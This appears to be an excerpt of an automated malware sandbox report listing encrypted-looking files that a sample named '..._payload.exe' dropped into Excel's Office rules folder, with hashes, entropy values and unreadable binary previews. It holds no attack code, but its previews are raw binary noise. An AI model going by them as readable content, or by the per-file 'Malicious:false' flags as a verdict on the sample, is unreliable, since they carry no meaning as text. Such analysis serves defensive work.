                                                                                                                          Preview:<?xml..%1....8."D..%..........BwrA. sh...Z;N[.j..1h.h..z..|..H/n....W..=..x..~A.z.^.#&8n......E6_D.!\k....Y!c..a....W@..2<..~...Dr....(...Q.4..,;^..d:.-[.Sl.G}..A/.%#.z...,.I......{.M..H7]...Sv+......q\..4.......pI...f.<....C...{Ei@O......5]..............[.)..ZV.r`..}...6..u.n.zp...i.~..5....>.+).....32..-.....&P...KWL..M..VRC.L.g.86.\...ds.(........TV.t.B0.{.n)..s......E..c0......9'..4.$H...Q.s.......&..........E...7...4..gR......#.{~UD.yQco&+.PS...q....{..^.k['.+...%B.....nu ..i.\.<..S..L.H.h...H.../.G..Li....?...B....T..E.^+@P...9..=..W.'.>...Y.{....1.&4.;NW.2Z.....p.G..b1KHB..6.q..{?.....i^:.[H%'L.6ap....C...F.L&T.]n`Z.|;Xz.......(k..@...(R.4...X>M.....@.;s../_.v.D.b.:..}]K.0B._t(..Wk..*.@.. 0.4.Bc.'~c..GVz].......!X......~\.o.@eT.:..R.7.0.V.=/.....NSg^).v.......x".`?d.'xW.&.@j..G.1..../j.U.....v.;F4.......+.{.F.......E.B$"E.....$/.i!.z..k.~2..pq..+t....(.9.=!7.P .5?.DL..)^......6..%!...9I....P0-^\..k.._.....sl..x....h..6..F!.h<..z

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68025v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1276
                                                                                                                          Entropy (8bit):7.848893698428327
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QUJPQ+vbTHvnYMaya7wTxYeapt5A33f8wiTpw6pIbuC6iqEZ/39YJN0bD:QXeHAMayJeea3mf8lTOLbuC6i13IAD
                                                                                                                          MD5:408D87EBA3EDFA52978109A3155B9C4D
                                                                                                                          SHA1:C4212A8652E5E09966F944DE3DD9525F0182BF6F
                                                                                                                          SHA-256:8B4887760A447EDFEEE0C78A824F65E397787755E38849436C6DED10675BB16C
                                                                                                                          SHA-512:FC98504F40215A980BF81E40798F9C0FAB4D73E77438C10D982334912EB9DBFB7D62742606DC4F31BBAEF7A8C21174C1331D459EF413CD6FD8A412BAC10A5F8E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml-...-....}.......n..*.....~s.<.j..?tA...6..'n[..Un{..P.qi..#...........uy........oe."}...%5J.......@....T.........'~.6....Gm.tN.d...02p..N..i....i...~a.-6.....;.o..*-H.N.u..B+.l...4L.9.R.x......;R.u....j.....>..JN.w.`...;A]9......If=.t."./...a?.....&.B..=eeK.5u..5..W.E"...B......N..T..<M.&.'.....l{Vx<..G=.....v.=......"d...F...-...X...!.E.....+:...W.`..s_rR?./..(......3.,.`..@.Tf.0.w.Gl.\..i).....^........X..V..w..$..K...l.......<.&..O.....m._i.;..w....8.).I|//zS..;K.'..FBHX..vk=,.....}........9..Z..r.C..............!w^.....8......9w..~...:c....5.}_h.j.W.=.C.K.v..M.?Wl(0&.....t..dH].....s....[..o.V.{.8..U.......N..pZ....A.nq...P4....a..l.U....w.gu.M..he`.\P.v....J,..`..!..G5..R.A.].C*..pbnl,{.TAC.m.j....)df.....@W.p2.\.).7...J..O.......?'. D.C.{..].....n..O.~........h...2..QH..uX[...&.!..Jc.-..$.2.........].*..\........ ..#\.{....f.....n......l...r$K....I......<..#.?....}.B.JT..Gh..A.MQ.b.5.\.Z:.wX....ON..d..8..Z...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68026v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2037
                                                                                                                          Entropy (8bit):7.904126650372017
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:NkmglHHc8/JBVarmSSAK/KLcJ6FdvyOCMiV04ixkhjzLEZD:zQHHcCBVarmbRSwJsokktzLc
                                                                                                                          MD5:66B30DF5594C544B34A93136C1FE225D
                                                                                                                          SHA1:70EE1A4AD8A8C6AD3BC6B081482FF641050BEDE4
                                                                                                                          SHA-256:B06F175313210BE7CEEB7D8BE386671A352BF579D35303E75A5B1AEA709C1EA9
                                                                                                                          SHA-512:D0D005E56E76D6EFF639208DEDC0899DAAFEE6A38CA46915CA02A1BED9D5ABF6F80529F0A0618E6A01DFA143039AD5738151EB1696DEB240042C3D6887C1DB0E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..A\...|.R.r.O....w.7Ee!M?../;.....I.{s..]..9...........a..T..{\+.!..v...@#-M.].6AL.\Dv.-W*..(6....,(....QX.H..o0.XZ..17y[..)...8f.W...........z*..... k6I..n.~[...}R.M:...|..hB..n.8...u...AA....^.;PpM...Y.k.....|..P0...9N./....).c....)"...(5o..M...$"....Br...h_5S&....Z.;........E..&rf1....z.....\2.c...Zy....r........{&..nG......3.o.^(.e..u..<....TX..J.q. ...g.wr....\..I.......:{K..\...6....m&.....f.../q...Od..d.......=...........\c.......H...|5v.=.l.......v...u.....=o.p..$.12..=.sf.b.'....S.FdlQ.....r..h.>45.&.x4..G...{...9.i7vr...!.|..F....0....2..|5...9....|.V~.\.....-. DU............P.`..AS.R<..."..*N...._..K$.8i..=b......."f.D....p...v.pa.......LP..j.6G.....F...cG>4..".....M.L....-.C.....@.........../d..0&.K_...8^....u....*..e{j9...(\.D..k5...a.9.5 ...."..'8;.h.r.....a)MBJ.G|..t1.....N.!P.....53.F.$.Mrpf..k.7%<.....s.h.N.xa.ex.~.M..+...v.....T.....h...b......FQ.zq....f.....r%...t..lX..[.t..<.w....}(-,.1. ..."o...6.I.E.........Gf ..7..t.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68027v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1180
                                                                                                                          Entropy (8bit):7.827624358977953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:oz8zxibOqv6HKpKaQqiId9vMLF5FHnAJg0cEhtFUxLbtkbD:o8ihSqYaFiE9vMLzFgJg7EhTiL5uD
                                                                                                                          MD5:332DC9D21ED482956354A5648E2F1D43
                                                                                                                          SHA1:330ECE6F70C2486D874B84CFBBA732B72C966E71
                                                                                                                          SHA-256:A36503C11D8295DF61BBC25AC89250F6111BC53229A8E1C402CC2C010C6884FF
                                                                                                                          SHA-512:B6F8DEB91A330EA559A8169629589E86D30B9EDF818BBB1EBD1B17C5B5EDD8C5EB092B1A447D660657FFFF3AB48C7468CA062600D1E1F171CC1878AE80F4732D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.^.S.W.....g....=..Y........2..F^l....".7..5L........L}.`B.....W.^\O.......R.v.;.V.?......7~."!n>..Z}8..`..g/...z......Du.....OQ./zqWc....e.tQX..1.Nh/ud...k.!.}9Z..i-..V.Zc.]..i..<s.....F"........:.}..q..u..PK.7...+.....:g.M/.{=....6.c.n....$....c[5r.5c.@....gJ.....*.U.t...t....J....3..6q.v5....(>(.U...f..T..<Q..%..|h..+.'........a...3;.....p.c..ZR..g.K4S....2".A.../7..jnv.........@.......8..PV8.)..w....3.9...H....P...PxG..M....\.e..r..'.v.r...M0<..o.....!..%p..B..k.x.O..1.'..9........g..a..E.{..~.*..'^...".sCi...I....n..se6.C."\Y>.$...C#e0L.S......(..n2..h1.I5..X".;...~...J..[..]T.......%..o....o2I..._..m...s..I.I..2...0,.G.E.w.|H.VI%.iBB.:..l.../..am}..+.?..q....M .e*.U.1...5K...*..tM.el.'|.|.~.-a..vV."5.[..0TZ...>..N..O0..f..}P.....o.Vr....X..56m....p....K...WSM:......{..$>...........sD.fJ...K}y.ogT.Z..r........:..}./.j.NI\....#K.m...'l*.....IS..........Fo......:...(........l..E..j......j.W..........e....o;|..K.....3 \#..*1.n

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68028v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):899
                                                                                                                          Entropy (8bit):7.762557199460713
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:BcWT11ZLpLvUVMrumm36N7oCGOEdt99Jb/QRfldd9FIs12fnSjIHm/sSuirKzq53:mm11Z9UchUrbJid1T8QYGbD
                                                                                                                          MD5:CAC65E91271B45E563D12C83A790C806
                                                                                                                          SHA1:45DE7B1E43D9FA22EF3DCCB55F1E52D1EDE406B6
                                                                                                                          SHA-256:509B17D1678045C5F45220A1F5D9BEEFAF694FE795A7EC1C7C5B68E83F0E311A
                                                                                                                          SHA-512:B8107346544A9ADBC020FDB986F1B64EE51AA383957B7A11C56DED2B991C281BE060B2DE2DA2D3DFCC6FF126B681ACE404A49BA21FF7C8B62D84F785BF2E0207
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...)....f.o........m.c.(.J,...\..K......(..f..PGy...|..y....f9..eF.|8..H...!....,{...../..#..O#....Q....'.20g.E...;.e...n..[#/L..>p.6.......s..:Qv..P..$..Q.....1..e.W.f..l......h...#7c......UB9t..R..K..Pd.....oM......@.t..G}F..s..V$....OK.<Pz.'.z..nbt*.B0s,..g#:c."i0..@]...].......a.n.ja....+..+...O....b...L.......-..#O...Al......>........Z^Tl.w^....!.).I.\N...._....]....E..zk.......^.B7d..!n.+....,...F.....v.j.Ft&Z..."....n,D_....*.....6.K$.Y.S.....o........I{.|...9....n........:/h.I~...,...c.............=..!Hq|.;37..Bk..=yFH7..4].$${....:3..v...{....=..m@x...`..,p.$P.Y..3..8|Y;E..@zZT...5L.e.j*..e.*. ..mt...B....z"+.bg.N.Lb.r.RM..jl"...7rT?.5........3-.H..M..OIA.."P...x.....b$H..P.nw.<c...Ec..s.q+...i.......C..U....+Q.....^8.6WS.OU....:..qD......nphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68029v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2224
                                                                                                                          Entropy (8bit):7.905363871287674
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:VGbiV6DsB0eSt/RFVjtBtODIX8yq/LqFJ4g4RxjViD:ZVKsB0eWFVj/8Dc8yq/jxVq
                                                                                                                          MD5:2E33550051D187CCF26AC1D7AC927D11
                                                                                                                          SHA1:EB16CF0E8039AAAE2D77F1804ACA0342BEF28A2B
                                                                                                                          SHA-256:ECBA5CF038947742A847A9F9FB1EEF9542873048E18F63484D92C07658999A88
                                                                                                                          SHA-512:FAF170D9EAB456E5AF86507F8BDDB9B4553E91612EE1B5DEC03B94D2F9D4985DFEB6C028261B4FA78491FF2A741DF45270BBC0CE263A05E71EE3F33B7BCA58BF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlb.D.K...]...=...#.i.q....b.$.3.J...wH.x.l....loVI(.Bv.9.z(..1=k.....sD.F.>[.?G...<.Z'Jh5...f..S.}........).%O..JI..F.?..E.#0a..aR.'..M....l.C3..Z.G...ME.y.Y\e..sd.7...$X.....>&u....q..W=.h.W..~.Q..[...l.H...}./7...j..@..U8x..aV..}>.pD}j.....O..J.....[)...l..G....E.iV.%ki..qAA4...=u$..G>c..J.....R........(......i..Z..-o......?...R...g....xK K%\.2.V(.e.4,<i..l...L.7.........!......3..p......q.|.%.$K.Zt1.a..].9...@..X.....|E.D[.}+8..q=...O..-../......HB.H+...N...Z..%.wW..(v~.]..,.......0.....>k.XQ..;.JZ.....l..d...89.K....4.........0.....4T....._.P....o....(.x.r8...P.....`.....*Z'z.Ya..u..+(..XO}....Y8r....0Z(c...#........N..$P..[...\.z.j..^.".j........,...SY..=......l.p(.....z.)...}.!,..G.,.!.w....X5..,g!U....0.-.....u..dC....[r....S..R.......g.c.Xt..Q.7xHy..S......W..'t.{Dw..../.cj.%....G[.]...%.._.N.n.s......B.%.O.'.tH{..r......S.L^.y...s-...7+.u!zpX.)\dmL...... w."*.....^^..ZbO..z.y.a.m.?.$.0.2g...=...&..$be&..~?X.Z.+....%{.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68030v6.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1560
                                                                                                                          Entropy (8bit):7.858505295588498
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:IdexH1x4NaymkpbFpRPR9ohPOst6gjcsh1vEl/RD:BGNbFLRcW/Y1yZ
                                                                                                                          MD5:442AEFFAC57BDB19C1F4C5276786AA92
                                                                                                                          SHA1:4128310425453BDD8E32A4E52CFA123FD48E3FB3
                                                                                                                          SHA-256:2F8F86A49143C239FDEE9C96E53656BA51ABE692FE7043B31E65490E727AF983
                                                                                                                          SHA-512:A9C34F13685EEB6B22707C56810F809C26689A3E16696D3D0380D078BC6705EFE62429E9882AB0B977E521C1441A4CFEF0E658858D891F5C9B56C672909824C9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..L..].N..y.Tg@.2..j..K..9O..N.....1.*....k.Gri..75,..w?..C..</v.......o.[.s....n.....Z..M.z.I.....{.)*!^.DDmy.P10.-.ci{X.2k.^W.|.C.%..;. f..d......y.3o.#.?...V0...4.,..8.?P.w..D...Z......B........|...RB..P..F..c....2.tUK~.4....<O.'.)....U.'.(.%..1.ULYK1...zD...Sn...U.@.Bu.......ed.(.T...\H7.n|F.o....]...U.Xa...}_.9.}F+..."^.'I.L5.FJ.9.2?./..P.)j.........F.......ke%,ymz.*I..y.6...L.V.9..H.......p.`....4....Q3.E...]e>v.^oX...U.V..E.....E.,.QE...^......%xxuj..Em.P..:d.Qe.].M:."`....E..*..#..m..2..'.Z./.:..I.|.y.c.P.[ITs..f..a$l.....3.&..M.AZ.b"...O.......@..#....Z..S...A..P........j.'58.6....D..&...HN.B.F....!Z....&.YMz..........Ti)..8....J.h=...[z....r]VR(.d+.$.... .V.).l.y2.)....M....#-.H^...W).z.\1..x_.....p"..xk2.$E..........P..#...b7F....b.x.....wq...sm..6.-...1)xd... .1.g.n?]w...Xs....3u...".t 1.D.I..b..1M..?....Z...`....).../Q..J6]...7.6.e.#..Y]..u.^.L...d.y..z..^.......R....O@.i..D..6.0._K.<.2....G..{".PlY.K.}.G.^..%...Jv

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68031v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1206
                                                                                                                          Entropy (8bit):7.849599865274654
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mYodW2KTCsDDJWUqujQC5geps1v6gVG7XlK74wfImxhT4sTt+bD:CWjCwqujFgea1ygVG7g74UTdt8D
                                                                                                                          MD5:E5520CFD2AA4FE1E5E615A69C959AF09
                                                                                                                          SHA1:A0BD6A05AEC14181BD560089AB71CA72CD06F8D4
                                                                                                                          SHA-256:BE2A1CE4C52BC3E38D4AD40A4EB239419ACEE811B25A743EA27F4F9B53C45C81
                                                                                                                          SHA-512:4E555038E6898153C536013157EDFD73357B84585AAC6B24B3EE91727895ECB6422929A603437B8E10D972CFD88758F4FC3B4A7F83345DBCC1DD0AABFE4C4C07
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlO...&...s..._Q..&.85..o.Aw.<..n.b.p...A1...~5NA....)._..Iz...\.00.....x|.m=9DK..U.p..*..Yz.i9...i...."..8....\.^|.Qdb1..`...p.=.gU.....Q....+."RKJJ.^x.q.....Hd.E.*^.l...]9.,.A..X.`...L.8X....'8.#......{.t.}.M..3a.).wjq.c.i3.cW[..F...tF..T...{....o...../4.ow...~.4?C5....._M.$..q.4u.d...t\..L6..a5..<Ds......B.v.\..c.SV.....U...7ME..;R..: ._..>R.LP...z.H.......4.W.'E...;..J^.XW.Ax.3.............j?....Z.fK.......3...,+T.6...6..."....[k.n....)...p....`.h&,.Yo...y.B.....]fD.U2.~xF....o]..qV.7K.U..H.m.d=..?......}...K'+.....m9.......[.G7.....cjv..t.S.........Y..#[..b..N.r..n....!..[W-.I.O.c....i....N.*....Xc..gX8../....Y..#M@.....Vz.^V.%...W...Y.e...+.l.|.@G.eP..;'t..2....`L.....E.Y....7:#.|.<..L.0...|.!....\CE..Tt/....Z<\Q|-.l...d...g.o.h05&.U...L..I.Tk.a....o...Hn=...m.,........%.d...F....s....9.....u.Y..........R..%LAb...2.3..5.J.....u..h......u....&..^....."..y.{.5W../..y.$.tt.q. g(....*..c. J...t..fMp......q.j..T...Z.....,..#.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68038v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):738
                                                                                                                          Entropy (8bit):7.704735301843783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:izOeUNh3SfecgMAvX0xvi+Ib9FkRd1tTRLwUj/pEuPSGVl0tEOhoMSuq5bTcii9a:TTNhimxMAv0Y+IMP1t9FvSGVl0tEuObD
                                                                                                                          MD5:152164FF17A8EDF3FAFAD95AC397AC2E
                                                                                                                          SHA1:2E6D770B0CB103555D7BD170C84FAF1B18C194B8
                                                                                                                          SHA-256:61437FBBC5E4DC9F0767DA081CC5C88B86263F8BB776634758A91A6EB8534303
                                                                                                                          SHA-512:C431F2FA388DB64CE032596883EA95E9FB2925BA4B5F1F75B036654B59C22796C66F4197D67550F897CDE20D9C9ED51B28B041C81B1000A0F60174C1E86A5967
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlD....S..2.S%..'......_.,(.>..=..5.o6!...9....Y.I.T@.F.5X,.?.......\>E.b.....(N....P....k..OE......".1..:.4TYw....<P./}5..UT..<.*w.[.]..mV.w..&.....!:@H+VH.F)d'F.Y{5...1*%.p...'...k.H...f.O.*.....n..0.'I...o..b.........Dt....`.>.F.z.u8.W.....7.c..Y...(/=!_o....2..i.$B<...;W......p..sn.T....V~....w.n.....Z...(..s....b.,xq.............~..E#....[...|.......Q...$p..`A....~./....-l6.nyP.c....'..p.....w;.t'..p.X...-....#.S.d...h.rK...,..c..K..=kA....=..o..e.!..q.<.....xS....47...a..U...,.>.f;..N@zr..[^%.a.<........FU........V..`...UQ0t|.x......>.;<.N..H|...uQ.J.F.^.=.%.q...<)..JA"M.......C.9'.....He.:.@1.;.7.cU<o...<......OphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68039v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1044
                                                                                                                          Entropy (8bit):7.7818452381274925
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:yOPjffrEQlfMoVkNkhI0JDCz46sqcIXZvjreLBvm0PnjZkAGwkbD:7jfogfMotxDM46sCXZvjURnj7GLD
                                                                                                                          MD5:39D8DDA9359C65755D9E3D84AB15539E
                                                                                                                          SHA1:7BEEFF3948D1F80D53E9734F699DF9F5B83ED038
                                                                                                                          SHA-256:33BE9129BE23B6845AC7D0B252048C27D5EA983D0544F1004AE1972066CCC8CD
                                                                                                                          SHA-512:F736FBAB805009B302B33CEB92BB88E406AE24880E49E4679151088981295E2E54A3C3F43E67ECCBAE5CE1491841D30B717F9ABD6700BBCBAB0E87F79BF9C180
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.1.}7o..@......[.b...zx.&.RcL.c.y)/.0.>/.2..V!.&.p^7X..U.^..)./[w.:t....%+{...~...A.g.Gi.#..{..c.%.....x...[3..B.%.A.&zK..->.(..M.I."..$..D.Z-.(.9.Y.qT........=x]L4F.Ap..<.%Jf..o)..p.t.....i.......*2..L.....,x.</Z.....-Y&....,Rw..m..:.'.(.;n...O.0..]/.......D....eO~._..s.....Qx.pU.|...fJ.1..&..D.......*=*..'......F.m.?/.'$.Y./...M..(...M...K.".e..\Xh.g....Y..N...R..,...[F..}......Iv..M.9.=$-.F...(....).....e_...Iy.=B...9.>Y.k..>...K..a.T.suC).......r........6l....J:...nv.6M8..B..4...-..].Bj.F;...:%.....r.v.-..-C.... .@..../...*..<;F.\vh.-...X..e..i.I.+k:...?.6...T.!....h0#.v.!...P=.....b..."......."..t....|(.o..f........,...1(...../5....2.pL...~.[......={.-X...CADOPf/...v....l...J.d...c.u#.:....f5$...T..i.#...jqPFB..5../...]1...6..*.kHw..(.%......p.i..Y...8@jX.....7p...mZ.q.....~..21..P.JI..c.621k<C.4......f..F...j')z......._.fq.f..w.u...7@2.8.....j^..f....1...$..[..mf.....3..?f.|.@i.}........../}\2SphJtdHo970vyx7vwlYG00OakDR75RuJz7N

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68040v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):862
                                                                                                                          Entropy (8bit):7.7256964575605584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:94rzvUyuFj+Eh6XovujMaD/jq8thcu67ho7bD:94/vUVFaEAXUujV7RPcTho/D
                                                                                                                          MD5:1677BBC9CE5AC2638A3A1B2CF86786A4
                                                                                                                          SHA1:D6E5194A1B38A8620F00FAFD04F892B714AC77C2
                                                                                                                          SHA-256:04E407F54E9D9B104F3E17BE0E26399CB9EAFCF1240756CD1AAB9834D7D192C8
                                                                                                                          SHA-512:6311C76C0B497B4C561B2CC3F4D57D4B0566B1232F1010AC19039E51DBC03055A89DE66F39903DB11B77CD946D5A7561472BEE65CEB2C6198C45CC74E5A44B35
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml'.'/...q.._Q...TAJjUE..j.......).:cR.J.....$..]...T.\M...>......,..3.D......T<.B.XR..=...c...-3.p.~..}K)<J'.b..C.5...,>~2...a.=\_.4.7....2^.N.[....&O.C...bhvm...>P]...H....Z....Q..2o(...+..JZ..GpB...... ..y5..l..g..~..C..I..,...dNR...2....:oF.L_.8.....%..;.%......?...../0u.4Ic.:XXh.dSv.|.^..RQ..}...B..o.->.-x_.k.......uJ.>.E...($4_:pw...X..p.@.)^..%I.o.\v.^(+..._.].e.Dam...2.yN.NP\A........aO@....6...F..K...|..w....`...z}.......Z^.R..N.&+rc..d.|.k..7.+....h.!o..}`..U....C.Qg.....6...G.r.a\.e7....j.ws.d/./.l..vEsO...}.$>w.... [a...wU........I#..t9w_..9 a#.Q..5O.......Hu~.<.....$.............fa.....l4......},(Bn.T.4..AF.9..'...l..p]#o.....h.,..?.tq*.d...'...t...*.M...C4.'"R(#..*/{+gqx..'o...y........A...X......1q..8.....). <.qB..H.N...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule69600v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1376
                                                                                                                          Entropy (8bit):7.85426999369044
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:n7PgWF4k3dAtwHru2kUUKkMZeqht9LrzyJGNRNGKS6uI6Fd1W17n2SbD:n7kwe8+UUxMdrNmsRNg6uR5W5fD
                                                                                                                          MD5:CDEB036E5ACFF4364DA060CB26382184
                                                                                                                          SHA1:26B359EA534ECD59C842629519601C3D94493F54
                                                                                                                          SHA-256:33DE72E130AD479887C69CC06B09E6BF46F89C2F7E219E65A2569D16495A2C8C
                                                                                                                          SHA-512:3DAD4DB70F381C4B09AA10F42DBE5B043D95FC947AB84F77A8948B6F14336314332A6789C7F821BE3146B398D5D70AD87EDD0424ED72852F48D08AC9AD8834D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...05*....SwF......+..C.!c/.(;p....T`...a.-=.[..W&...P..~...7.L.J.#......m4M.....u.9.#... ....@e...M.........u...nn..l|.(.G\..'w6..n...V^.m......|..^L..?._....{;W......>.a..V...b..q/..d1.~...Wm.{\.<,3.'..3.B1......R,...G..H|...~..o.S.c..._k....5......_..,@%.?f.>.K.m9J@m?x.....j...&...*..~.d.4.7.%.......I....$.. N....[.Ppi.-.....'.<.+..7*..`.....X..+.X.=."]&h%o.4c......Y.U`I...o..X.!?....../....u.k.....s`x8...s.".Xq.z+$3...L.b.o7.[..............y$.v9d.......X.....\.;s..p....=;.8.c...5+...V~.g.q.#".A[.=U4..Q..'...q.5.I8:1-..]. ....RI...S6_.!..4...k..E-9...m.4.$.o+:G.s.!$."O.^..*.J....V./...y.9q...?<q..e....e}i..Hp.....8.....q...y..Q...)P}..q.u/{... P...0Jn.`b....|&J...g.s.... y_.Z...!.....#H...A*I.8...Rro-.b4x(h..P...........<M.....s`........g.|...9O..K.p..0..B.....)p.Q..0....wf....y.$.\5B..b.uqT6.@B.QT......*....f>Vd...;..=`..r$.."..._.=.9]B..Vuns.2.2..0....dL...t...,.fd.:..,..{e.R..i.|....<....K.?.Y=~;.8Pwgia$...N..%Ve.B....Y.%]...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700000v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2037
                                                                                                                          Entropy (8bit):7.89298133193826
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gGDPAmzDQJG8d6XrU+E4WK5C2Svj3o5yXFBBlSXqfFD:lrvnowQjAyDBEaf9
                                                                                                                          MD5:E1431808911A0F27F99DCBC727FA2DD8
                                                                                                                          SHA1:5697D5405D5480D7E3644931F0F80C26C0F73233
                                                                                                                          SHA-256:E572BE8EA29B4E58CDEDAE271ECA0FE4DEF607003AE0DADA85EF93A0BF4EA3DE
                                                                                                                          SHA-512:1DE0E7D19D85408822528F0E9A24030CF72193658F2CEB57E4A392A39C377C534844D6BDB3D2ADC1FFF5A05E4CD6244E7CDC3F5C9DA180E123E3D2C9F84B26C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.G..@...X-..'..5o|S..a.....1....7.JG..R....~>.[J\....e............K tE.......*?..........Uzf..1.P.%....a.....lr.......;..~......ibyy..-C...'X.7?.o1...kK.D4."."...&UE.`.as...y.d.y.1b$._p....^..;........P........q2V...N..C2.^JD..M.....%.F>.*...{.......+....,h...5.f.2\....c...,....^/....w.8`..@z=..-+.3UD.l9......64(..wzs;.y.#..\....#R.k.....`g..H....O^9...*8Er.=.....a...g..i...v.3*M.AY.=J....#L.....5..d..v..+..>.L.Y.V....G..wB....V....6>......]R..O.....$........t/8...z...l.L...o.......a(...9.[..%.t.V.n%m.J...<..^.d.X .-%G..I\*F...\+..#_(*..>)MK...!..%4.<...I.Q"......^s...........C1.t....a.t.S....N..J.-P&.,x.?_....3...eGm..=.U-..C."..}$.....>..:m...y.jdx......u...x....&.......-......!.,.}2.|....g[......6.M.X.V.....|...`..D....t....l~.t.(.&..y.PI[".'.%:7.Q..).]...-+..V&..b..A.7....G.....$yY.|^\.q...e........$..6....LJ..<is<..p...8.p.Fj...a..R0$FoV...b..5b..pf....n...}.3'.. ....z[....`.M.9.......K... <.....I..C4.o......2N.?....Z:.........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700001v2.xml

                                                                                                                          Download File
